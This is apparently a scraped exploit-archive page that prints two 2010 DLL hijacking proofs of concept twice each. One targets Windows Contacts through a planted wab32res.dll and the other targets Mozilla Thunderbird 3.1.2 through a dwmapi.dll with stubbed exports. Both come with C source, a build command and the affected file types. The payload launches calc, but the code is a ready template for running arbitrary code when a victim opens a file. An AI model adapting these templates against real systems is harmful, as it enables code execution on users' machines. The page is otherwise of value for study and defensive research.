Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)

/*

Exploit Title: Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)

Date: August 25, 2010

Author: storm (storm@gonullyourself.org)

Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o wab32res.dll Contacts-DLL.c

.contact, .group, .p7c, .vcf, and .wab files are affected.

*/

#include

int hax()

{

WinExec("calc", 0);

exit(0);

return 0;

}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)

{

hax();

return 0;

}

Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)

/*

Exploit Title: Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)

Date: August 25, 2010

Author: storm (storm@gonullyourself.org)

Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o wab32res.dll Contacts-DLL.c

.contact, .group, .p7c, .vcf, and .wab files are affected.

*/

#include

int hax()

{

WinExec("calc", 0);

exit(0);

return 0;

}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)

{

hax();

return 0;

}

Mozilla Thunderbird DLL Hijacking Exploit ( dwmapi.dll )

/*

Exploit Title: Mozilla Thunderbird DLL Hijacking Exploit ( dwmapi.dll )

Date: 26/08/2010

Author: h4ck3r#47

http://twitter.com/hxteam

Version: Latest Mozilla Thunderbird 3.1.2

Tested on: Windows XP SP3

The code is based on the exploit from "TheLeader"

Vulnerable extensions: .eml .html

*/

#include

#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void  DwmDefWindowProc() { evil(); }

DLLIMPORT void  DwmEnableBlurBehindWindow() { evil(); }

DLLIMPORT void  DwmEnableComposition() { evil(); }

DLLIMPORT void  DwmEnableMMCSS() { evil(); }

DLLIMPORT void  DwmExtendFrameIntoClientArea() { evil(); }

DLLIMPORT void  DwmGetColorizationColor() { evil(); }

DLLIMPORT void  DwmGetCompositionTimingInfo() { evil(); }

DLLIMPORT void  DwmGetWindowAttribute() { evil(); }

DLLIMPORT void  DwmIsCompositionEnabled() { evil(); }

DLLIMPORT void  DwmModifyPreviousDxFrameDuration() { evil(); }

DLLIMPORT void  DwmQueryThumbnailSourceSize() { evil(); }

DLLIMPORT void  DwmRegisterThumbnail() { evil(); }

DLLIMPORT void  DwmSetDxFrameDuration() { evil(); }

DLLIMPORT void  DwmSetPresentParameters() { evil(); }

DLLIMPORT void  DwmSetWindowAttribute() { evil(); }

DLLIMPORT void  DwmUnregisterThumbnail() { evil(); }

DLLIMPORT void  DwmUpdateThumbnailProperties() { evil(); }

int evil()

{

WinExec("calc", 0);

exit(0);

return 0;

}

Mozilla Thunderbird DLL Hijacking Exploit ( dwmapi.dll )

/*

Exploit Title: Mozilla Thunderbird DLL Hijacking Exploit ( dwmapi.dll )

Date: 26/08/2010

Author: h4ck3r#47

http://twitter.com/hxteam

Version: Latest Mozilla Thunderbird 3.1.2

Tested on: Windows XP SP3

The code is based on the exploit from "TheLeader"

Vulnerable extensions: .eml .html

*/

#include

#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void  DwmDefWindowProc() { evil(); }

DLLIMPORT void  DwmEnableBlurBehindWindow() { evil(); }

DLLIMPORT void  DwmEnableComposition() { evil(); }

DLLIMPORT void  DwmEnableMMCSS() { evil(); }

DLLIMPORT void  DwmExtendFrameIntoClientArea() { evil(); }

DLLIMPORT void  DwmGetColorizationColor() { evil(); }

DLLIMPORT void  DwmGetCompositionTimingInfo() { evil(); }

DLLIMPORT void  DwmGetWindowAttribute() { evil(); }

DLLIMPORT void  DwmIsCompositionEnabled() { evil(); }

DLLIMPORT void  DwmModifyPreviousDxFrameDuration() { evil(); }

DLLIMPORT void  DwmQueryThumbnailSourceSize() { evil(); }

DLLIMPORT void  DwmRegisterThumbnail() { evil(); }

DLLIMPORT void  DwmSetDxFrameDuration() { evil(); }

DLLIMPORT void  DwmSetPresentParameters() { evil(); }

DLLIMPORT void  DwmSetWindowAttribute() { evil(); }

DLLIMPORT void  DwmUnregisterThumbnail() { evil(); }

DLLIMPORT void  DwmUpdateThumbnailProperties() { evil(); }

int evil()

{

WinExec("calc", 0);

exit(0);

return 0;

}